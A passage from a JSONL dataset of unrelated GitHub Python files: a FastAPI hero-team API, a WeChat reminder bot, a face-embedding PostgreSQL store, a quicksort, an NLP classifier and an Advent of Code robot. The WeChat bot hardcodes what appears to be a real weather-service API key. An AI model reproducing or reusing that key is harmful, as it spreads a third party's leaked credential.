response_model=List[Team])\nasync def getAllTeam():\n db = Session(engine)\n query = db.query(Team).join(Hero).all()\n\n response = {\n \"status\": 'success',\n \"data\": query\n } \n\n return query\n\n\n\n@app.get(\"/heroes\")\nasync def getAllHeroes():\n db = Session(engine)\n query= select(Hero, Team).join(Team)\n\n heroes = db.exec(query).all()\n\n return {\"heroes\": heroes}\n\n\n@app.post(\"/team\")\nasync def createTeam(team: TeamDto):\n db = Session(engine)\n db_team = Team(\n name=team.name,\n headquarters=team.headquarters\n )\n\n \n\n db.add(db_team)\n\n db.commit()\n\n response = {\n \"status\": \"success\"\n }\n\n return response\n\n\n@app.post(\"/heroes\")\nasync def createHeroes(hero: HeroDto):\n db = Session(engine)\n\n db_heroes = Hero(\n name=hero.name,\n secret_name=hero.secret_name,\n age=hero.age,\n team_id=hero.team_id\n )\n\n db.add(db_heroes)\n db.commit()\n\n response = {\n \"status\": \"Success\"\n }\n\n return response\n\n \n \nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", reload=True)\n\n\n", "repo_name": "renaldyhidayatt/simplejoinSqlModel", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlmodel.create_engine", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlmodel.SQLModel.metadata.create_all", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlmodel.SQLModel.metadata", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sqlmodel.SQLModel", "line_number": 18, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "models.hero.Hero", "line_number": 24, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 26, "usage_type": "name"}, {"api_name": "fastapi.FastAPI", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlmodel.Session", "line_number": 52, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 53, "usage_type": "argument"}, {"api_name": "models.team.Team", "line_number": 53, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 50, "usage_type": "name"}, {"api_name": "models.team.Team", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlmodel.Session", "line_number": 66, "usage_type": "call"}, {"api_name": "models.team.Team", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlmodel.select", "line_number": 67, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlmodel.Session", "line_number": 76, "usage_type": "call"}, {"api_name": "models.team.Team", "line_number": 77, "usage_type": "call"}, {"api_name": "sqlmodel.Session", "line_number": 97, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 99, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "16480670949", "text": "# encoding: utf-8\n\nimport _thread\nfrom datetime import datetime\n\nimport itchat, time\nimport requests\nfrom itchat.content import *\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\n# 自动登陆,命令行二维码,退出程序后暂存登陆状态\nfrom DateUtil import get_week_day\n\ntimes = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\nitchat.auto_login(enableCmdQR=2, hotReload=True)\n\n# 获取指定好友\ncarling = itchat.search_friends(nickName='Carling')[0]['UserName']\nbiu = itchat.search_friends(nickName='Biu')[0]['UserName']\nalpha_meow = itchat.search_chatrooms(name='阿尔法猫')[0]['UserName']\n\nsched = BlockingScheduler()\n\n\n# 阿尔法猫本体\ndef meow(threadName, delay):\n print('meow方法启动')\n\n # 监听普通消息\n @itchat.msg_register([TEXT, MAP, CARD, NOTE, SHARING])\n def text_reply(msg):\n print('普通消息:')\n print(msg)\n\n # 监听群聊事件\n @itchat.msg_register(TEXT, isGroupChat=True)\n def text_reply(msg):\n print('群组:')\n print(msg)\n if msg['isAt']:\n text = msg['Text']\n act_name = msg['ActualNickName']\n if str(text).find('提醒') > 0:\n new_jobs(sched, text, act_name)\n elif str(text).find('天气') > 0:\n weather(text)\n\n # itchat.send_msg(notice, toUserName=biu)\n # 保持登陆状态\n itchat.run()\n\n\ndef jobs(threadName, delay):\n print('jobs方法启动')\n # 添加任务\n # day_of_week = 'mon-fri' 表示从周一到周五\n # 订餐 - 每周六12点、21点提醒我订一星期的饭\n sched.add_job(func=job_ordering, trigger='cron', day_of_week='sat', hour=12, minute=00)\n sched.add_job(func=job_ordering, trigger='cron', day_of_week='sat', hour=21, minute=00)\n # 午餐\n sched.add_job(func=job_have_lunch, trigger='cron', day_of_week='mon-fri', hour=11, minute=45)\n # 午睡 - 每天中午12点45分提醒我睡觉\n sched.add_job(func=job_siesta, trigger='cron', day_of_week='mon-fri', hour=12, minute=45)\n # 种树 - 每天七点半提醒我收能量\n sched.add_job(func=job_plant_trees, trigger='cron', day_of_week='mon-fri', hour=7, minute=30)\n # 下班\n sched.add_job(func=job_plant_trees, trigger='cron', day_of_week='mon-fri', hour=17, minute=55)\n # 喂鸡 - 每隔4小时提醒我喂鸡\n sched.add_job(func=job_siesta, trigger='interval', hours=4, minutes=30)\n # 休息\n sched.add_job(func=job_rest, trigger='interval', minutes=30)\n sched.start()\n\n\n# 午餐\ndef job_have_lunch():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:到点吃饭啦\\n'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 订餐提醒定时器\ndef job_ordering():\n ordering_url = 'http://hy.dmeiwei.com/wx/wxgetcodeurl_dczx.asp'\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:小嘉琳记得公司订餐呐\\n' \\\n '链接是:\\n' + ordering_url + '\\n请现在立刻马上行动起来!'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 午睡提醒器\ndef job_siesta():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:已经到午休时间啦,你们快点去睡觉觉/睡'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 种树\ndef job_plant_trees():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:快去支付宝收能量啦,不然要被偷走了'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 喂鸡提醒器\ndef job_feeding_chickens():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:要去看看鸡仔饿了没有哦'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 下班\ndef job_off_duty():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:到点下班回家撸猫啦'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 休息\ndef job_rest():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:别太忙了,要起来走走动动,喝杯水,休息一下。'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 新建提醒\ndef new_jobs(sched, text, act_name):\n arr = text.split('/')\n date_format = arr[1]\n date = arr[2]\n obj = arr[4]\n todo = arr[-1]\n\n itchat.send_msg('阿尔法猫已经收到信息了,新建了一个任务\\n时间是:' + date + \"\\n任务内容是:\" + todo, toUserName=alpha_meow)\n\n if date_format == 'longtime':\n t_struct = time.strptime(date, \"%Y-%m-%d %H:%M:%S\")\n sched.add_job(func=job_notice, trigger='date',\n run_date=datetime(t_struct.tm_year, t_struct.tm_mon, t_struct.tm_mday,\n t_struct.tm_hour, t_struct.tm_min, t_struct.tm_sec),\n args=[obj, act_name, todo])\n\n\ndef job_notice(obj='我', act_name=None, todo=None):\n if obj == '我':\n obj = act_name\n\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:' + todo + '\\n @' + obj + ' '\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\ndef weather(msg):\n arr = msg.split('/')\n if len(arr) > 1:\n location = arr[1]\n if location == '今天':\n location = '广州'\n\n args = {'location': location, 'key': '12d04dfd2f514c158f6b69291225576e'}\n res = requests.get(\"https://free-api.heweather.net/s6/weather/now\", params=args)\n if res.status_code == 200:\n result = res.json()\n # 体感温度,默认单位:摄氏度\n fl = result['HeWeather6'][0].get('now')['fl']\n # 温度,默认单位:摄氏度\n tmp = result['HeWeather6'][0].get('now')['tmp']\n # 实况天气状况描述\n cond_txt = result['HeWeather6'][0].get('now')['cond_txt']\n\n if int(fl) <= 20:\n remind = '记得多穿点衣服哦'\n elif int(fl) >= 28:\n remind = '记得多补水,注意防晒'\n else:\n remind = '要开开心心的呢'\n\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n' + location + '天气:' + cond_txt + \",气温:\" + tmp + \"°C,体感温度:\" + fl + '°C' \\\n + '\\n阿尔法猫提醒你:' + remind\n itchat.send_msg(notice, toUserName=alpha_meow)\n else:\n notice = '天气预报异常啦,Biubiu快去看看'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 创建两个线程\ntry:\n _thread.start_new_thread(meow, (\"Thread-1\", 2,))\n _thread.start_new_thread(jobs, (\"Thread-2\", 4,))\nexcept:\n print(\"Error: unable to start thread\")\n\nwhile 1:\n pass\n\n# 文件传输助手\n# itchat.send('hello world', toUserName='filehelper')\n", "repo_name": "biuhe/wechat-robot", "sub_path": "login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 7247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.strftime", "line_number": 14, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 14, "usage_type": "call"}, {"api_name": "time.time", "line_number": 14, "usage_type": "call"}, {"api_name": "itchat.auto_login", "line_number": 16, "usage_type": "call"}, {"api_name": "itchat.search_friends", "line_number": 19, "usage_type": "call"}, {"api_name": "itchat.search_friends", "line_number": 20, "usage_type": "call"}, {"api_name": "itchat.search_chatrooms", "line_number": 21, "usage_type": "call"}, {"api_name": "apscheduler.schedulers.blocking.BlockingScheduler", "line_number": 23, "usage_type": "call"}, {"api_name": "itchat.msg_register", "line_number": 31, "usage_type": "call"}, {"api_name": "itchat.msg_register", "line_number": 37, "usage_type": "call"}, {"api_name": "itchat.run", "line_number": 51, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 78, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 80, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 89, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 96, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 101, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 103, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 110, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 115, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 117, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 124, "usage_type": "call"}, {"api_name": "itchat.send_msg", "line_number": 135, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 138, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 140, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 151, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 162, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 182, "usage_type": "call"}, {"api_name": "itchat.send_msg", "line_number": 185, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 190, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 191, "usage_type": "call"}]} +{"seq_id": "70758828329", "text": "from facekeeper.core import StorageInterface, PersonEmbedding\nimport numpy as np\nimport psycopg2\nfrom typing import List, Optional\nfrom psycopg2.extensions import register_adapter, AsIs\nfrom psycopg2.extras import RealDictCursor\n\n\ndef addapt_numpy_array(numpy_array):\n return AsIs(list(numpy_array))\n\n\nclass PostgreSQLStorage(StorageInterface):\n def __init__(self, dsn: str):\n super().__init__()\n register_adapter(np.ndarray, addapt_numpy_array)\n self.dsn = dsn\n self.conn = None\n\n def save_embedding(self, person: str, digest: str, recognizer: str, embedding: np.array, tags: List[str],) -> str:\n try:\n cur = self.get_connection().cursor()\n sql = \"INSERT INTO embeddings (person, digest, recognizer, embedding, tags) VALUES (%s, %s, %s, ARRAY%s, %s) RETURNING id\"\n cur.execute(sql, (person, digest, recognizer, embedding, tags))\n row = cur.fetchone()\n self.get_connection().commit()\n return row['id']\n except psycopg2.errors.UniqueViolation:\n self.get_connection().rollback()\n # We anyway will return the ID of already saved embedding\n return self.get_embedding_id(recognizer, digest)\n finally:\n cur.close()\n\n def get_embeddings(self, recognizer) -> List[PersonEmbedding]:\n cur = self.get_connection().cursor()\n sql = \"SELECT id, person, embedding, tags FROM embeddings WHERE recognizer = %s\"\n cur.execute(sql, (recognizer,))\n\n return [PersonEmbedding(r['id'], r['person'], np.array(r['embedding']), r['tags']) for r in cur.fetchall()]\n\n def get_embedding(self, embedding_id: str) -> dict:\n cur = self.get_connection().cursor()\n sql = \"SELECT * FROM embeddings WHERE id = %s\"\n cur.execute(sql, (embedding_id,))\n return cur.fetchone()\n\n def get_embedding_id(self, recognizer, digest) -> Optional[str]:\n cur = self.get_connection().cursor()\n cur.execute(\n \"SELECT id FROM embeddings WHERE recognizer = %s AND digest = %s\", (recognizer, digest),\n )\n row = cur.fetchone()\n return str(row['id']) if row else None\n\n def get_connection(self) -> psycopg2.extensions.connection:\n if self.conn is None:\n self.conn = self.connect()\n\n return self.conn\n\n def connect(self) -> psycopg2.extensions.connection:\n return psycopg2.connect(self.dsn, cursor_factory=RealDictCursor)\n", "repo_name": "dairlair/facekeeper", "sub_path": "facekeeper/storage/postgresql.py", "file_name": "postgresql.py", "file_ext": "py", "file_size_in_byte": 2479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycopg2.extensions.AsIs", "line_number": 10, "usage_type": "call"}, {"api_name": "facekeeper.core.StorageInterface", "line_number": 13, "usage_type": "name"}, {"api_name": "psycopg2.extensions.register_adapter", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "psycopg2.errors", "line_number": 28, "usage_type": "attribute"}, {"api_name": "facekeeper.core.PersonEmbedding", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "facekeeper.core.PersonEmbedding", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "psycopg2.extensions", "line_number": 56, "usage_type": "attribute"}, {"api_name": "psycopg2.connect", "line_number": 63, "usage_type": "call"}, {"api_name": "psycopg2.extras.RealDictCursor", "line_number": 63, "usage_type": "name"}, {"api_name": "psycopg2.extensions", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "21453959135", "text": "import random\nfrom typing import List\n\n\nclass Solution:\n def sortArray(self, nums: List[int]) -> List[int]:\n low = 0\n high = len(nums)-1\n self._quick_sort(low, high, nums)\n return nums\n \n def _quick_sort(self, low: int, high: int, nums: List[int]) -> None:\n # 递归返回条件\n if low >= high:\n return\n mid = self._partition(low, high, nums)\n self._quick_sort(low, mid-1, nums)\n self._quick_sort(mid+1, high, nums)\n\n def _partition(self, low: int, high: int, nums: List[int]) -> int:\n # 选取pivot_idx\n pivot_idx = random.randint(low, high)\n # 将pivot换到首位(因为pivot已知 相当于把首位空下来)\n nums[low], nums[pivot_idx] = nums[pivot_idx], nums[low]\n pivot = nums[low]\n l, r = low, high\n while l < r:\n # r由右往左移动 找到一个小于pivot的数 将其挪到'空出来'的位置(此时的 l)\n # 完成'挪动'后此时 r 相当于也空了下来\n while l < r and nums[r] >= pivot:\n r -= 1\n nums[l] = nums[r]\n # l由左往右移动 找到一个大于pivot的数 将其挪到'空出来'的位置(此时的 r)\n # 完成'挪动'后此时 l 相当于也空了下来\n while l < r and nums[l] <= pivot:\n l += 1\n nums[r] = nums[l]\n nums[l] = pivot\n return l", "repo_name": "jerrt2003/leetcode-in-python", "sub_path": "912_Sort_an_Array/quick_sort.py", "file_name": "quick_sort.py", "file_ext": "py", "file_size_in_byte": 1450, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "5093241901", "text": "# ------------------ Importing necessary libraries -----------\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import PunktSentenceTokenizer\nfrom nltk.stem import WordNetLemmatizer \nimport nltk\nimport pickle\nimport re\n\nnltk.download('stopwords') #stopwords\nnltk.download('wordnet') #database of English language\nnltk.download('punkt') #tokenization\nnltk.download('vader_lexicon') \n \n\n# --------- Text cleaning ---------\ndef preprocess(text):\n text = str(text)\n #strip \n text = re.sub(r'.+?', '', text) \n text = re.sub(r'.+?', '', text)\n text = re.sub(r'<.+?>', '', text) # remove all other html tags\n text = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', text)\n \n ## remove punctuations, non-alphanumeric characters and underscores\n text = re.sub(r'[^\\w\\s]|\\d|_', ' ', text)\n \n text = str(text).lower().strip()\n \n #tokenize\n tokenizer = PunktSentenceTokenizer()\n tokens = tokenizer.tokenize(text)\n \n #remove stopwords\n stop_words = stopwords.words('english')\n tokens = [t for t in tokens if t not in stop_words]\n \n #lemmatize\n lemmatizer = WordNetLemmatizer()\n tokens = [lemmatizer.lemmatize(t) for t in tokens]\n text = \" \".join(tokens)\n text = str(text).lower().strip()\n text = [text]\n \n return text\n\n# ------- TFIDF + AdaBoost -----------\n\ndef model(text):\n # Preprocess text\n text = preprocess(text)\n \n # Load TFIDF\n tfidf = pickle.load(open(\"tfidftest.pkl\", \"rb\" ) )\n text_vectorized = tfidf.transform(text)\n \n # Apply Trained Model \n \n model = pickle.load(open('Ada10est81acc.sav', 'rb'))\n \n result = model.predict(text_vectorized)\n \n return result\n\n\n\n\n", "repo_name": "marinamer/Political-Bias-NLP", "sub_path": "Flask/ml_model.py", "file_name": "ml_model.py", "file_ext": "py", "file_size_in_byte": 1710, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.download", "line_number": 9, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 10, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 11, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 12, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 19, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 25, "usage_type": "call"}, {"api_name": "nltk.tokenize.PunktSentenceTokenizer", "line_number": 30, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 34, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 34, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 38, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 53, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "252855898", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nsolution for day 11 of 2019\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nimport sys; sys.path.append('..')\nfrom intcode import Intcode\nfrom collections import deque\nfrom matplotlib import pyplot as plt\n\n\nwith open('input.txt', 'r') as f:\n data = f.read()\n\n\nclass Robot(Intcode):\n\n def __init__(self, data, once=False, emerg_hull=False):\n self.coord = [[[0, 0], 0]]\n self.directions = deque(['up', 'right', 'down', 'left'])\n self.direction = None\n self.color = None\n self.painted = 1\n self.emerg_hull = emerg_hull\n self.inpt = None\n super().__init__(data, once)\n\n\n def getInput(self):\n \"\"\"returns the value that goes in input to op3\"\"\"\n if self.emerg_hull:\n self.emerg_hull = False\n return 1\n value = self.getCurrentColor()\n return value\n\n\n def getCurrentColor(self):\n \"\"\"returns the color of the tile the robot is standing on\"\"\"\n current = self.coord[-1]\n self.sensor_color = current[1]\n return self.sensor_color\n\n\n def manipulate(self):\n \"\"\"allows for the parsing of the 2 intcode outputs: color and rotation\"\"\"\n if len(self.outputs) % 2 == 0 and self.outputs != []:\n self.color = self.outputs[-2]\n if self.outputs[-1]:\n self.directions.rotate(-1)\n self.direction = self.directions[0]\n else:\n self.directions.rotate(1)\n self.direction = self.directions[0]\n self.move()\n\n\n def findTile(self, x, y):\n \"\"\"returns the tile if it's tracked, else None\"\"\"\n target = [x, y]\n for elem in self.coord[::-1]:\n if elem[0] == target:\n return elem\n\n\n def move(self):\n current = self.coord[-1]\n current[1] = self.color\n\n x, y = current[0] # get current coordinates\n\n if self.direction == 'up':\n y += 1\n elif self.direction == 'right':\n x += 1\n elif self.direction == 'down':\n y -= 1\n else:\n x -= 1\n\n target_tile = self.findTile(x, y)\n if target_tile:\n color = target_tile[1]\n else:\n color = 0\n self.painted += 1\n self.coord.append([[x, y], color])\n\nrobot = Robot(data)\nprint(robot.painted)\n\n\n# create a new object for part 2\nreg_ident = Robot(data, 1, emerg_hull=True)\ncode = [x[0] for x in reg_ident.coord if x[1] == 1]\n\nx_em = [x[0] for x in code]\ny_em = [y[1] for y in code]\n\nplt.scatter(x_em, y_em)\nplt.xlim(-3, 43)\nplt.ylim(-20, 20)\nplt.show()\n", "repo_name": "gmnr/advent-of-code", "sub_path": "2019/11/day11.py", "file_name": "day11.py", "file_ext": "py", "file_size_in_byte": 2671, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "intcode.Intcode", "line_number": 22, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}]} +{"seq_id": "27212894053", "text": "import six\nimport time\nimport copy\n\nfrom distutils.version import StrictVersion\nfrom abc import ABCMeta, abstractmethod, abstractproperty\nfrom collections import defaultdict\nfrom functools import partial\n\nimport django\n\ntry:\n from django.core.cache import get_cache\nexcept ImportError:\n from django.core.cache import caches\n def get_cache(backend):\n return caches[backend]\n\nfrom django.http import Http404\nfrom django.db import models, transaction\n\ntry:\n from django.db.models import get_models\nexcept ImportError:\n from django.apps import apps\n get_models = apps.get_models\n\ntry:\n from django.db.models.fields.related import ReverseSingleRelatedObjectDescriptor\nexcept ImportError:\n from django.db.models.fields.related_descriptors import \\\n ForwardManyToOneDescriptor as ReverseSingleRelatedObjectDescriptor\n\nGenericForeignKeyObject = None\ndef importGenericForeignKey():\n global GenericForeignKeyObject\n if GenericForeignKeyObject is not None:\n return GenericForeignKeyObject\n try:\n from django.contrib.contenttypes.generic import GenericForeignKey\n GenericForeignKeyObject = GenericForeignKey\n except ImportError:\n from django.contrib.contenttypes.fields import GenericForeignKey\n GenericForeignKeyObject = GenericForeignKey\n return GenericForeignKey\n\n\nfrom flash import settings as flash_settings\nfrom flash.option import Some\nfrom flash.utils import memcache_key_escape, flash_properties\n\n\ncache = get_cache(flash_settings.CACHE_NAME)\n\n\ndef is_abstract_class(cls):\n \"\"\" Returns boolean telling whether given class is abstract or not.\n\n A class is abstract if it has not implemented any abstractmethod or\n abstractproperty of base classes.\n \"\"\"\n return bool(getattr(cls, \"__abstractmethods__\", False))\n\n\ndef instancemethod(method):\n \"\"\" Decorator for creating descriptor class to call method with\n instance when called with class.\n \"\"\"\n class MethodDisc(object):\n def __get__(self, ins, cls):\n if ins is None:\n # when method is called from class\n # get instance of that class and use that\n try:\n ins = cls()\n except NameError:\n return method\n return partial(method, ins)\n return MethodDisc()\n\n\nclass DontCache(object):\n def __init__(self, val):\n self.inner_val = val\n\n\n@six.python_2_unicode_compatible\nclass StaleData(object):\n def __init__(self, timestamp):\n self.timestamp = timestamp\n\n def __str__(self):\n return \"StaleData(timestamp=%s)\" % self.timestamp\n\n\ndef cache_get_many(keys):\n if not keys:\n return {}, {}\n\n d = cache.get_many(keys)\n result_dict = {}\n stale_data_dict = {}\n\n for key, value in d.items():\n if isinstance(value, StaleData):\n stale_data_dict[key] = value\n else:\n result_dict[key] = value\n\n return result_dict, stale_data_dict\n\n\nclass InvalidationType(object):\n OFF = 0\n UNSET = 1\n RESET = 2\n DYNAMIC = 3\n\nUSING_KWARG = '__using'\n\nclass WrappedValue(object):\n def __init__(self, value, version, timestamp):\n self.value = value\n self.version = version\n self.timestamp = timestamp\n\n\nclass Cache(six.with_metaclass(ABCMeta, object)):\n \"\"\" The very base class for all cache classes.\n\n Methods decorated with abstractmethod or abstractproperty\n have to be implemented by derived classes.\n\n It's necessary to put ABCMeta or its derived class to put\n as metaclass to achieve above constraints.\n \"\"\"\n # Derived class may provide serializer (E.g. for compression)\n serializer = None\n\n # default version\n version = 0\n\n # default timeout\n timeout = flash_settings.DEFAULT_TIMEOUT\n\n # default invalidation\n invalidation = InvalidationType.UNSET\n\n # default allowtime\n allowtime = None\n\n cache_type = 'SimpleCache'\n\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n @property\n def key(self):\n return self.get_key(*self.args, **self.kwargs)\n\n @abstractmethod\n def get_key(self, *args, **kwargs):\n \"\"\" Returns the key for given params (args and kwargs).\n \"\"\"\n pass\n\n @instancemethod\n def get_dynamic_version(self):\n from flash.models import CacheDynamicVersion\n return CacheDynamicVersion.objects.get_version_of(type(self))\n\n @staticmethod\n def get_stale_key(key):\n return key + '__stale'\n\n def to_cache_value(self, value):\n if self.serializer:\n value = self.serializer.dumps(value)\n return value\n\n def from_cache_value(self, value):\n if self.serializer:\n value = self.serializer.loads(value)\n return value\n\n @staticmethod\n def get_write_lock_key(key):\n return key + '__write_lock'\n\n def try_acquire_write_lock(self, key):\n write_lock_key = self.get_write_lock_key(key)\n return cache.add(write_lock_key, True,\n timeout=flash_settings.WRITE_LOCK_TIMEOUT)\n\n def release_write_lock(self, key):\n write_lock_key = self.get_write_lock_key(key)\n return cache.delete(write_lock_key)\n\n def get_option_value_from_cache_coroutine(self, key, extra_keys=None,\n key_value_dict=None):\n \"\"\" key: str,\n extra_keys: list\n key_value_dict: dict,\n\n Yields value assosiated with key in cache, wrapped as Option value.\n\n If extra_keys is passed then all values are fetched assosiated with\n keys in extra_keys and put to key_value_dict.\n \"\"\"\n keys = []\n 